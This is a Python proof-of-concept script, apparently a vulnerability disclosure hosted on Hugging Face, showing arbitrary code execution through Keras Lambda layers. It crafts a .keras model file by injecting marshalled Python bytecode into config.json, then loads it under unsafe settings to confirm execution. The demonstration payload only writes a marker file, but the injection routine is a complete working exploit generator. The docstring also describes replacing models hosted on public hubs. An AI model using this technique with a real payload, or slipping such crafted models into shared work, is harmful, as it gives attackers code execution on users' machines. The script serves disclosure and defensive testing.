keras-lambda-ace-poc / poc_keras_lambda_ace.py
Rammadaeus's picture
Upload poc_keras_lambda_ace.py with huggingface_hub
56f70cb verified
#!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC
VULNERABILITY:
.keras model files are ZIP archives containing config.json. Lambda layers
store base64-encoded marshal'd Python bytecode in config.json under the
"function" -> "config" -> "code" key. When a model is loaded with
safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
this bytecode is unmarshalled and executed - enabling arbitrary code execution
from a crafted model file.
IMPACT:
Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
code execution. Many official tutorials and StackOverflow answers recommend
safe_mode=False to load models with custom layers. HuggingFace hosts thousands
of .keras files that could be replaced with malicious versions.
ATTACK VECTOR:
1. Attacker creates a legitimate-looking .keras model
2. Attacker replaces Lambda layer bytecode with malicious payload
3. Victim downloads model from HuggingFace, Kaggle, or email
4. Victim loads with safe_mode=False -> code executes silently
AFFECTED:
- keras >= 3.0 (all versions using .keras format)
- tensorflow >= 2.16 (ships keras 3.x)
TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12
Usage:
python3 poc_keras_lambda_ace.py
"""
import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
MARKER_FILE = "/tmp/keras_ace_marker.txt"
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"
def create_malicious_keras_model(output_path):
import tensorflow as tf
import numpy as np
print("[*] Step 1: Building legitimate model with Lambda layer...")
model = tf.keras.Sequential([
tf.keras.layers.Input(shape=(5,)),
tf.keras.layers.Dense(10, name="dense_1"),
tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
tf.keras.layers.Dense(1, name="output"),
])
model.compile(optimizer="adam", loss="mse")
tmp_dir = tempfile.mkdtemp(prefix="keras_poc_")
legit_path = os.path.join(tmp_dir, "legit.keras")
model.save(legit_path)
print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))
print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
with zipfile.ZipFile(legit_path, "r") as zf:
archive_files = {name: zf.read(name) for name in zf.namelist()}
config = json.loads(archive_files["config.json"])
evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
MARKER_FILE, PAYLOAD_MSG
)
print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))
evil_expr = compile(evil_source, "<payload>", "eval")
lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0]
evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
print(" Encoded bytecode: {} chars".format(len(evil_b64)))
def inject_into_lambda(obj):
if isinstance(obj, dict):
if obj.get("class_name") == "Lambda" and "config" in obj:
func = obj["config"].get("function", {})
if isinstance(func, dict) and "config" in func:
func["config"]["code"] = evil_b64
print(" Injected payload into Lambda layer config")
return True
for v in obj.values():
if isinstance(v, (dict, list)) and inject_into_lambda(v):
return True
elif isinstance(obj, list):
for v in obj:
if inject_into_lambda(v):
return True
return False
if not inject_into_lambda(config):
print(" ERROR: Could not find Lambda layer in config.json")
sys.exit(1)
print("[*] Step 3: Repacking .keras file with malicious config...")
archive_files["config.json"] = json.dumps(config).encode()
with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
for name, data in archive_files.items():
zf.writestr(name, data)
print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
shutil.rmtree(tmp_dir)
def test_safe_mode_true(model_path):
import tensorflow as tf
print("\n[*] Test A: Loading with safe_mode=True (default)...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
tf.keras.models.load_model(model_path)
print(" Model loaded (unexpected)")
return os.path.exists(MARKER_FILE)
except Exception as e:
print(" Blocked as expected: {}".format(str(e)[:150]))
return False
def test_safe_mode_false(model_path):
import tensorflow as tf
import numpy as np
print("\n[*] Test B: Loading with safe_mode=False...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
loaded = tf.keras.models.load_model(model_path, safe_mode=False)
print(" Model loaded with safe_mode=False")
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
return True
print(" No execution on load. Running inference...")
result = loaded.predict(np.random.randn(1, 5), verbose=0)
print(" Inference result: {}".format(result))
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
return True
print(" No ACE triggered")
return False
except Exception as e:
print(" Error: {}".format(str(e)[:300]))
return False
def test_enable_unsafe_deserialization(model_path):
import tensorflow as tf
import numpy as np
print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
try:
tf.keras.config.enable_unsafe_deserialization()
loaded = tf.keras.models.load_model(model_path)
print(" Model loaded with enable_unsafe_deserialization")
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
return True
print(" No execution on load. Running inference...")
result = loaded.predict(np.random.randn(1, 5), verbose=0)
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
content = f.read().strip()
print(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
return True
print(" No ACE triggered")
return False
except Exception as e:
print(" Error: {}".format(str(e)[:300]))
return False
def main():
print("=" * 70)
print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
print("=" * 70)
script_dir = os.path.dirname(os.path.abspath(__file__))
malicious_model = os.path.join(script_dir, "malicious_lambda.keras")
if os.path.exists(MARKER_FILE):
os.remove(MARKER_FILE)
create_malicious_keras_model(malicious_model)
ace_safe = test_safe_mode_true(malicious_model)
ace_unsafe = test_safe_mode_false(malicious_model)
ace_global = test_enable_unsafe_deserialization(malicious_model)
print("\n" + "=" * 70)
print("RESULTS:")
print(" safe_mode=True (default): {}".format("ACE!" if ace_safe else "Blocked (correct)"))
print(" safe_mode=False: {}".format("ACE!" if ace_unsafe else "No ACE"))
print(" enable_unsafe_deserialization(): {}".format("ACE!" if ace_global else "No ACE"))
print()
if ace_unsafe or ace_global:
print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
print("code execution when loaded with safe_mode=False or after calling")
print("enable_unsafe_deserialization().")
print()
print("Marker file: {}".format(MARKER_FILE))
if os.path.exists(MARKER_FILE):
with open(MARKER_FILE) as f:
print("Contents: {}".format(f.read().strip()))
print("\nMalicious model saved to: {}".format(malicious_model))
else:
print("No ACE triggered. Check TensorFlow/Keras version.")
print("=" * 70)
if __name__ == "__main__":
main()